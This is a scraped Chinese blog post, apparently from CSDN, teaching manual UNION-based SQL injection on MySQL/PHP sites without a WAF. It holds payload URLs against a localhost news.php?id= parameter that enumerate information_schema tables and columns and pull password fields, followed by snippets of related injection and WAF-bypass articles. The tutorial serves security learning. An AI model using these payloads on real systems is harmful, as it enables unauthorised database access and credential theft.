mysql+php在无waf情况下的手工注入

最新推荐文章于 2023-07-09 12:49:13 发布
最新推荐文章于 2023-07-09 12:49:13 发布
阅读量88 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43727099/article/details/103191252
版权

    我们在手工注入时,应该先去判断是什么类型的数据库,再去选择手工注入的方式

简介    

  mysql5.0以下版本无information_schema元数据库所以注入方式应该和access差不多,在mysql5.0以上的版本,有了information_schema数据库所以不需要去猜测表名和库名,可以直接在information_schema中去调用。

schemata:用于存放所有数据库的名

tables:用于存放所有数据库中数据表的名

columns:用于存放所有数据库中所有表中的字段名

查看a数据库中存放了哪些表

select table_schema(字段) from information_schema.tables(表) where table_schema="a";(字段)

查看b数据表中包含了哪些字段

select column_name (字段)from information_schema.columns(表) where table_name="b";(字段)

理解:其实这两个句子可以和select * from news where id =1做一个对比

注入点判断

开始判断注入点也是 and 1=1 and 1=2

联合查询

这个联合查询有别于access注入时的联合查询 ,union select 1,2,3,4,5,6 后面可以不用表名,access必须要

url:http://127.0.0.1/news.php?id=1 union select 1,2,3,4,5,6 (有时前面的值id=1时页面显示的正常值,我们需要报错才可以id=-1)

http://127.0.0.1/news.php?id=1 union select 1,2,3,4,5,6  在显位符user()当前用户名,version()数据库版本。database()数据库名

http://127.0.0.1/news.php?id=1 union select 1,table_name,3,4,5,6  from information_schema.tables(表) where table_schema="a"

有时候网站会只显示一个,但是表名有多个(group_concat())可以显示字段中的所有内容

当我们联合查询知道了字段名后就不需要调用information_schema这个数据库了直接从表里拿

unhex(hex(password))进行编码的转换(只要内容不要格式)

 

 

 

 

 

 

 

 

 

 

 

 

 

小d-
关注
SQL注入和sql-labs通关1-18(手工注入、高权限注入、文件读写、提交方式、查询方式、WAF绕过、sqlmap)
m0_61506558的博客
07-25 866
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。......
sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2465
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql:oracle、MySQL、mssql、access、sq...
手工sql注入&&绕过waf &&一个实例分析
蚁景网安学院
09-28 828
这篇文章,将教大家基本的手工sql注入和绕过waf的知识;分享一个实例,为了效果建议读者自己去搭建环境,因为真实环境都不怎么理想。1.sql注入的基础2.sql注入绕过waf3. s...
【封神台】无WAF的SQL注入
qq_63806300的博客
12-17 1750
【封神台】SQL注入
如何识别网站是否有WAF
wutiangui的博客
07-09 1051
使用:进入wafw00f文件夹,启动cmd。输入python main.py url 即可以探测目标网站是否存在waf。安装:在此目录下创建CMD窗口,输入 python setup.py install。安装成功后,显示版本信息.如果扫不出来应该是字典里没有对应的关键字,需要自己填充。我们可以对没有开启WAF的做目录扫描。使用工具识别:wafw00f。像这种的是没有WAF的。而这种的就是有WAF的。
Access数据库中的SQL注入(无waf
kali_boy的博客
11-27 3391
一.关于Access数据库和简单注入用到的SQL 1.access数据库 Microsoft Office Access是由微软发布的关系数据库管理系统,也就是说在我们的
php编写的通防waf
06-12 2835
几乎能抵御所有web层能导致getshell的攻击(暴力) 在多次线下攻防比赛中表现优异,几乎没有被攻破 添加日志记录,流量记录功能 简洁日志 all_requests.txt记录的类似于apache的日志,但是它能显示出每次访问POST过来的数据 详细日志 all_requests_details.txt记录的是详细的请求头信息,类似burp中截取的请求。 攻击流量 attack_detect_log.txt记录的是waf检测到的攻击请求,waf会将详细的攻击向量记录在这个文件中,并在文件开头表
mysql union as 注入_Mysql 手工注入【常规 Union 查询篇】
weixin_42499681的博客
02-17 267
文章来源于:lsh4ck's Blog在开始真正的注入技巧之前,我们先来大致回顾下必要的 mysql 数据库基础下面是注入 Mysql 时经常会用到的一些单行函数,熟练使用是灵活注入的前提,尤其是在对抗一些 Waf 的时候字符串连接函数,将多个字符串连接成一个字符串,注意,中间只要字符串有一个为空,最后结果也为空 同样是连接多个字符串,但可以在开头指定分隔符,跟 concat()稍微不同,它会自动...
sql注入空格被过滤_网站渗透:SQL注入WAF绕过思路分享
weixin_39657444的博客
11-16 618
一、前言这个注入是之前做测试时发现的,但是测试的时候发现有防护,但是想想这么个小网站都绕不过,实在不应该啊。开始补充学习各种场景、各种waf绕过姿势,勉勉强强的成功执行我构造的SQL的语句。趁着还有些印象,就写下过程当记录吧,本次全程打码,纯技术分享。二、注入发现首先,网页打开是这样的,好熟悉的表单页面,常规测试一下,XSS、SQL注入,XSS我都玩腻了感觉没啥好研究的。随便碰碰运气测下SQL注入...
打造一款可靠的WAF(Web应用防火墙)
热门推荐
Enweitech Software Works
12-26 2万+
之前写了一篇《WAF防御能力评测及工具》,是站在安全运维人员选型WAF产品的角度来考虑的(优先从测试角度考虑是前职业病,毕竟当过3年游戏测试?!)。本篇文章从WAF产品研发的角度来YY如何实现一款可靠的WAF,灵感来自ModSecurity等,感谢开源。 本片文章包括三个主题 (1) WAF实现 WAF包括哪些组件,这些组件如何交互来实现WAF防御功能  (2)WAF规则(策
PHP waf加固sql注入和xss注入
单核CPU的小朋友的博客
05-02 1712
PHP WAF 代码如下: <?php #this php page is provide the safe value. class waf { private $input; private $pattern; private $log_path; function __construct() { session_start()...
php waf 搭建,开源WAF搭建
weixin_42212965的博客
04-15 1090
ModSecurity在Ubuntu和Nginx上安装,nginx版本为1.14.0。安装需要包下载编译ModSecurity 3.0源代码进入目录运行编译如果出现fatal: No names found, cannot describe anything.,是可以忽略的。ModSecurity连接器下载连接器代码根据已安装的nginx版本安装需要的nginx原代码需要把连接器编译为动态模块到n...
渗透测试mysql SQL注入——WAF 绕过原理
网络安全领域优质创作者
02-16 1678
WAF绕过必要条件 1,熟练掌握mysql函数和语法使用方法 2,深入了解中间件运行处理机制 3,了解WAF防护处理原理和方法 一,WAF绕过原理——白盒绕过 代码样例 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($resul...
sql注入中的union select 1,2,3....
内心不种满鲜花就会长满杂草
03-15 2万+
在sql注入联合查询中,我们会碰到union select 1,2,3。那这个是什么意思了,首先先看下union select union select 用来合并两个或多个 SELECT 语句的结果集。比如这里新建了两个表,users和users2 users表如下 users2如下 联合查询,即查询users表中的name字段的值和查询users2表中的address字段的值,将结果一起返回 注意:union select只能查询两个表中共同都有的字段,如果一个字...
hadoop_3_2_0-hdfs-journalnode-3.3.4-1.el7.x86_64.rpm
09-16
Ambari+Bigtop 一站式编译和部署解决方案 https://gitee.com/tt-bigdata/ambari-env
注册会计师会计第十章 所有者权益.doc
09-16
注册会计师会计第十章 所有者权益.doc
沈阳航空航天大学在河南2021-2024各专业最低录取分数及位次表.pdf
09-16
全国各大学在河北2021-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
移动方块小游戏-Python
最新发布
09-16
玩家使用键盘的左右箭头键来控制小方块左右移动。 游戏窗口会不断生成障碍物,从屏幕顶部随机位置下落。 如果玩家碰到障碍物,游戏结束。
MySQL数据库特性与WAF Bypass探索
12345union*/` 可以在不被WAF检测到的情况下执行 `union` 操作。 - 换行符可以通过 `%0a`、`%2d%2d%0a` 等编码方式引入,以绕过基于字符串匹配的WAF规则。 4. **括号嵌套**: - 使用括号 `( )` 可以构造复杂的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值